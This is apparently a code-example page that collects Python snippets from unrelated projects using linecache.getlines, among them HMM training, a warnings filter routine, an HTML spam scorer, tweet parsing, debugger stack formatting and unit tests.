        x_len = np.append(x_len, job.get()[1])
    pool.close()

    labels = []
    for number in x:
        if number in labels:
            pass
        else:
            labels.append(number)

    # print(labels)
    le.fit(labels)

    print('**************************************')
    t()
    print(le.classes_)
    model_le_name = MODEL_PATH + 'le.pkl'
    with open(model_le_name, 'wb') as model_file:
        pickle.dump(le, model_file)
    print("le saved")

    x = x[:, np.newaxis]

    new_x = le.transform(x)
    X = np.array(new_x).astype('int32')
    # X = X[:, np.newaxis]
    X = X.reshape(-1, 1)
    # print(X.shape)
    # print(X.dtype)
    #
    print(X)
    print(len(X))
    #
    # print(x_len.shape)
    # print(x_len.dtype)
    X_len = np.array(x_len).astype('int32')

    # print(X_len.shape)
    # print(X_len.dtype)
    print(sum(X_len))

    number_of_status = 100
    print('¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥')
    t()
    print('Start Training')
    model = hmm.MultinomialHMM(n_components=number_of_status,
                               n_iter=10000,
                               tol=0.01,
                               verbose=True)
    model.fit(X, X_len)
    # print(model.score(x,x_len))
    print('**************************************')
    print(model.transmat_)
    model_name = MODEL_PATH + 'hmm.pkl'
    with open(model_name, 'wb') as model_file:
        pickle.dump(model, model_file)
    print("hmm saved")
Beispiel #47
0
def warn_explicit(message,
                  category,
                  filename,
                  lineno,
                  module=None,
                  registry=None,
                  module_globals=None):
    lineno = int(lineno)
    if module is None:
        module = filename or "<unknown>"
        if module[-3:].lower() == ".py":
            module = module[:-3]  # XXX What about leading pathname?
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        text = str(message)
        category = message.__class__
    else:
        text = message
        message = category(message)
    key = (text, category, lineno)
    # Quick test for common case
    if registry.get(key):
        return
    # Search the filters
    for item in filters:
        action, msg, cat, mod, ln = item
        if ((msg is None or msg.match(text)) and issubclass(category, cat)
                and (mod is None or mod.match(module))
                and (ln == 0 or lineno == ln)):
            break
    else:
        action = defaultaction
    # Early exit actions
    if action == "ignore":
        registry[key] = 1
        return

    # Prime the linecache for formatting, in case the
    # "file" is actually in a zipfile or something.
    linecache.getlines(filename, module_globals)

    if action == "error":
        raise message
    # Other actions
    if action == "once":
        registry[key] = 1
        oncekey = (text, category)
        if onceregistry.get(oncekey):
            return
        onceregistry[oncekey] = 1
    elif action == "always":
        pass
    elif action == "module":
        registry[key] = 1
        altkey = (text, category, 0)
        if registry.get(altkey):
            return
        registry[altkey] = 1
    elif action == "default":
        registry[key] = 1
    else:
        # Unrecognized actions are errors
        raise RuntimeError(
            "Unrecognized action (%r) in warnings.filters:\n %s" %
            (action, item))
    # Warn if showwarning() does not support the 'line' argument.
    # Don't use 'inspect' as it relies on an extension module, which break the
    # build thanks to 'warnings' being imported by setup.py.
    fxn_code = None
    if hasattr(showwarning, 'func_code'):
        fxn_code = showwarning.func_code
    elif hasattr(showwarning, '__func__'):
        fxn_code = showwarning.__func__.func_code
    if fxn_code:
        args = fxn_code.co_varnames[:fxn_code.co_argcount]
        CO_VARARGS = 0x4
        if 'line' not in args and not fxn_code.co_flags & CO_VARARGS:
            showwarning_msg = ("functions overriding warnings.showwarning() "
                               "must support the 'line' argument")
            if message == showwarning_msg:
                _show_warning(message, category, filename, lineno)
            else:
                warn(showwarning_msg, DeprecationWarning)
    # Print message and context
    showwarning(message, category, filename, lineno)
picklefile = open('/home/songjz671/covariancesurfaceout/surface.pickle', 'rb')
surface = pickle.load(picklefile)
#print(surface)
#print(surface['1ACB_E'])
omessurface = {}
filelist = []
for root, dirs, files in os.walk('/home/songjz671/covarianceout/omes'):
    for file in files:
        filelist.append(os.path.join(root, file))
for each in filelist:
    #w=xlwt.Workbook()
    #ws = w.add_sheet('covariance')
    filename = each.split('/')[-1]
    proteinid = filename.split('.')[0]
    a = linecache.getlines(each)
    pointresult = {}
    surfaceresult = {}
    for i in range(1, len(a)):
        part1 = a[i].split()[0]
        part2 = a[i].split()[1]
        if part1 not in pointresult.keys():
            pointresult[part1] = 0
        if part2 not in pointresult.keys():
            pointresult[part2] = 0
    num = len(pointresult.keys()) - 1
    for each_item in pointresult.keys():
        for each_one in range(1, len(a)):
            partone = a[each_one].split()[0]
            parttwo = a[each_one].split()[1]
            if each_item == partone or each_item == parttwo:
Beispiel #49
0
                x[line_no][col_no] = sku_dict[i]
                mask[line_no][col_no] = 1
                col_no += 1
            if col_no >= max_window_size:
                break
        word_num[line_no] = col_no
        line_no += 1

    return x, np.array(y).reshape(batch_size, 1), mask.reshape(
        batch_size, max_window_size, 1), word_num.reshape(batch_size, 1)


#========================
init_data(train_file)
n_classes = len(label_dict)
train_lst = linecache.getlines(train_file)
print("Class Num: ", n_classes)

# Store layers weight & bias
weights = {
    'h1': tf.Variable(tf.random_normal([emb_size, n_hidden_1])),
    # 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_hidden_1, n_classes]))
}
biases = {
    'b1': tf.Variable(tf.random_normal([n_hidden_1])),
    # 'b2': tf.Variable(tf.random_normal([n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_classes]))
}

def main():
    HtmlTagNbData= "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\tagnb.txt"
    HtmlWordNbData = "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\wordnb.txt"
    HtmlTagWeightData = "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\tagassess.txt"
    HtmlWordWeightData = "E:\\UnderGraduateDesign\\ExperimentSample\\AssetValue\\wordassess.txt"
    TagDict ={}
    WordDict ={}
    TagWeight = {}
    WordWeight = {}
    Tags = lc.getlines(HtmlTagNbData)
    Words = lc.getlines(HtmlWordNbData)
    TagWeights = lc.getlines(HtmlTagWeightData)
    WordWeights = lc.getlines(HtmlWordWeightData)
    Total = 125
    Spam = 29
    NonSpam = 96
    for tag in Tags:
        tag1 = tag.split(" ")[0]
        proba = tag.split(" ")[1]
        proba = proba.split("\n")[0]
        TagDict.setdefault(tag1,proba)
    for word in Words:
        word1 = word.split(" ")[0]
        proba = word.split(" ")[1]
        proba = proba.split("\n")[0]
        WordDict.setdefault(word1,proba)
    for tagweight in TagWeights:
        tagweight1 = tagweight.split(" ")[0]
        fun = tagweight.split(" ")[1]
        fun = fun.split("\n")[0]
        TagWeight.setdefault(tagweight1,fun)
    for wordweight in WordWeights:
        wordweight1 = wordweight.split(" ")[0]
        fun = wordweight.split(" ")[1]
        fun = fun.split("\n")[0]
        WordWeight.setdefault(wordweight1,fun)
    HtmlDataPath = "E:\UnderGraduateDesign\ExperimentSample\HtmlSource2"
    HtmlFiles = os.listdir(HtmlDataPath)
    HtmlProbDict = {}
    for f in HtmlFiles:
        fo = open(HtmlDataPath + "/" + f,"r")
        html = fo.read()
        fo.close()
        taglist = tte.Extract(html)
        words = ws.ExtractCharacter(html)
        wordlist = ','.join(ws.SepWord(words)).split(",")
        Tprob = 1.0
        Wprob = 1.0
        for tag in taglist:
            if TagDict.has_key(tag) and TagWeight.has_key(tag):
                Tprob = Tprob*float(TagDict[tag])*float(TagWeight[tag])
        for word in wordlist:
            if WordDict.has_key(word) and WordWeight.has_key(word):
                 Wprob = Wprob*float(WordDict[word])*float(WordWeight[word])
        Tprob = Spam*Tprob
        Wprob = Spam*Wprob
        Allprob = Tprob*Wprob
        HtmlProbDict.setdefault(fng.DeGenerate(f),Allprob)
        print fng.DeGenerate(f),":",Allprob
    FunList = sorted(HtmlProbDict.items(), key=lambda e:e[1], reverse=True)
    for fun in FunList:
        print fun
Beispiel #51
0
import linecache
from collections import Counter
from nltk.corpus import stopwords
from nltk import bigrams
from nltk import pos_tag
import string
import re
from nltk.tokenize import TweetTokenizer

tknz = TweetTokenizer(strip_handles=True, reduce_len=True)
stop = stopwords.words('english') + list(
    string.punctuation) + ['rt', 'via', 'u', 'im', '...', '..', ':)']

tweets = linecache.getlines("dev-tweets.txt")
tweets = [x.split("\t") for x in tweets]
f = open('dev-parsed.txt', 'w', encoding='utf-8')

for line in tweets:
    line[2] = line[2].replace("'", " ")
    terms_all = [
        term for term in tknz.tokenize(line[2].lower())
        if term not in stop and (len(term) > 1 and not term.isdigit())
    ]
    bgs = bigrams(terms_all)
    f.write(str([list(set(terms_all)), list(set(bgs))]) + '\n')
f.close()
print("#######################")
print("done")
Beispiel #52
0
    def format_stack_entry(self, frame_lineno, lprefix=': ', context=None):
        if context is None:
            context = self.context
        try:
            context=int(context)
            if context <= 0:
                print("Context must be a positive integer", file=self.stdout)
        except (TypeError, ValueError):
                print("Context must be a positive integer", file=self.stdout)
        try:
            import reprlib  # Py 3
        except ImportError:
            import repr as reprlib  # Py 2

        ret = []

        Colors = self.color_scheme_table.active_colors
        ColorsNormal = Colors.Normal
        tpl_link = u'%s%%s%s' % (Colors.filenameEm, ColorsNormal)
        tpl_call = u'%s%%s%s%%s%s' % (Colors.vName, Colors.valEm, ColorsNormal)
        tpl_line = u'%%s%s%%s %s%%s' % (Colors.lineno, ColorsNormal)
        tpl_line_em = u'%%s%s%%s %s%%s%s' % (Colors.linenoEm, Colors.line,
                                            ColorsNormal)

        frame, lineno = frame_lineno

        return_value = ''
        if '__return__' in frame.f_locals:
            rv = frame.f_locals['__return__']
            #return_value += '->'
            return_value += reprlib.repr(rv) + '\n'
        ret.append(return_value)

        #s = filename + '(' + `lineno` + ')'
        filename = self.canonic(frame.f_code.co_filename)
        link = tpl_link % py3compat.cast_unicode(filename)

        if frame.f_code.co_name:
            func = frame.f_code.co_name
        else:
            func = "<lambda>"

        call = ''
        if func != '?':
            if '__args__' in frame.f_locals:
                args = reprlib.repr(frame.f_locals['__args__'])
            else:
                args = '()'
            call = tpl_call % (func, args)

        # The level info should be generated in the same format pdb uses, to
        # avoid breaking the pdbtrack functionality of python-mode in *emacs.
        if frame is self.curframe:
            ret.append('> ')
        else:
            ret.append('  ')
        ret.append(u'%s(%s)%s\n' % (link,lineno,call))

        start = lineno - 1 - context//2
        lines = linecache.getlines(filename)
        start = min(start, len(lines) - context)
        start = max(start, 0)
        lines = lines[start : start + context]

        for i,line in enumerate(lines):
            show_arrow = (start + 1 + i == lineno)
            linetpl = (frame is self.curframe or show_arrow) \
                      and tpl_line_em \
                      or tpl_line
            ret.append(self.__format_line(linetpl, filename,
                                          start + 1 + i, line,
                                          arrow = show_arrow) )
        return ''.join(ret)
'''
Test functions for applying the regionalisation of Kreemer et al. (2003):
'''
import os
import unittest
import numpy as np
from linecache import getlines
from hmtk.strain.geodetic_strain import GeodeticStrain
from hmtk.strain.regionalisation.kreemer_regionalisation import (
    _build_kreemer_cell, KreemerRegionalisation)

BASE_DATA_PATH = os.path.join(os.path.dirname(__file__), 'strain_data')
KREEMER_2POLY_FILE = 'kreemer_2poly_sample.txt'
KREEMER_2REG_FILE = os.path.join(BASE_DATA_PATH,
                                 'kreemer_2poly_sample_2types.txt')
KREEMER_POLY_SAMPLE = getlines(os.path.join(BASE_DATA_PATH,
                                            KREEMER_2POLY_FILE))


class TestBuildKreemerCell(unittest.TestCase):
    def setUp(self):
        self.data = KREEMER_POLY_SAMPLE

    def test_build_kreemer_polygon(self):
        expected_output_1 = np.array([[179.4, -66.], [180., -66.],
                                      [180., -65.5], [179.4, -65.5],
                                      [179.4, -66.]])

        expected_output_2 = np.array([[180., -66.], [180.6, -66.],
                                      [180.6, -65.5], [180., -65.5],
                                      [180., -66.]])
        print(self.data)
Beispiel #54
0
 def get_source(self, file_name=None):
     if not file_name or file_name == self.registry.get("script_file_name"):
         return self.registry.get("statement").split("\n")
     return [e.rstrip() for e in linecache.getlines(file_name)]
Beispiel #55
0
 def test_getlines(self):
     lines = linecache.getlines(self.file_name)
     self.assertEqual(lines, self.file_list)
Beispiel #56
0
import linecache
import time

now = time.time()  # 代码开始时间  # 前期准备,整理数据

data_keys = ('bid', 'uid', 'username', 'v_class', 'content', 'img', 'created_at', 'source', 'rt_num', 'cm_num', 'rt_uid', 'rt_username' \
, 'rt_v_class', 'rt_content', 'rt_img', 'src_rt_num', 'src_cm_num', 'gender', 'rt_bid', 'location', 'rt_mid', \
'mid', 'lat', 'lon', 'lbs_type', 'lbs_title', 'poiid', 'links', 'hashtags', 'ats', 'rt_links', 'rt_hashtags', 'rt_ats', \
'v_url', 'rt_v_url')


keys = {data_keys[k]:k for k in range(0,len( data_keys))}
print(keys)


f = linecache.getlines('t2lines.txt')

lines = [x[1:-1].split('","') for x in f]  # 拆分  # 1 输出用户总数

users = set([line[keys['username']] for line in lines])

user_total = len(set(users))
print(lines)
print(users)
assert type(user_total) == int
print("===========")
# 2 每一个用户的名字 list

users = list(users)
assert type(users) == list
Beispiel #57
0
 def test_no_ending_newline(self):
     self.addCleanup(support.unlink, support.TESTFN)
     with open(support.TESTFN, "w") as fp:
         fp.write(SOURCE_3)
     lines = linecache.getlines(support.TESTFN)
     self.assertEqual(lines, ["\n", "def f():\n", "    return 3\n"])
Beispiel #58
0
 def test_lazycache_already_cached(self):
     linecache.clearcache()
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     self.assertEqual(False,
                      linecache.lazycache(NONEXISTENT_FILENAME, globals()))
     self.assertEqual(4, len(linecache.cache[NONEXISTENT_FILENAME]))
Beispiel #59
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved.

    FIXED version with which we monkeypatch the stdlib to work around a bug."""

    file = getsourcefile(object) or getfile(object)
    module = getmodule(object, file)
    if module:
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')

    if ismodule(object):
        return lines, 0

    if isclass(object):
        name = object.__name__
        pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
        # make some effort to find the best matching class definition:
        # use the one with the least indentation, which is the one
        # that's most probably not inside a function definition.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                # if it's at toplevel, it's already the best one
                if lines[i][0] == 'c':
                    return lines, i
                # else add whitespace to candidate list
                candidates.append((match.group(1), i))
        if candidates:
            # this will sort by whitespace, and by line number,
            # less whitespace first
            candidates.sort()
            return lines, candidates[0][1]
        else:
            raise IOError('could not find class definition')

    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
        pmatch = pat.match
        # fperez - fix: sometimes, co_firstlineno can give a number larger than
        # the length of lines, which causes an error.  Safeguard against that.
        lnum = min(object.co_firstlineno, len(lines)) - 1
        while lnum > 0:
            if pmatch(lines[lnum]): break
            lnum -= 1

        return lines, lnum
    raise IOError('could not find code object')
def read_linecache(file):
    try:
        for line in linecache.getlines(file):
            print(line, end='')
    except:
        pass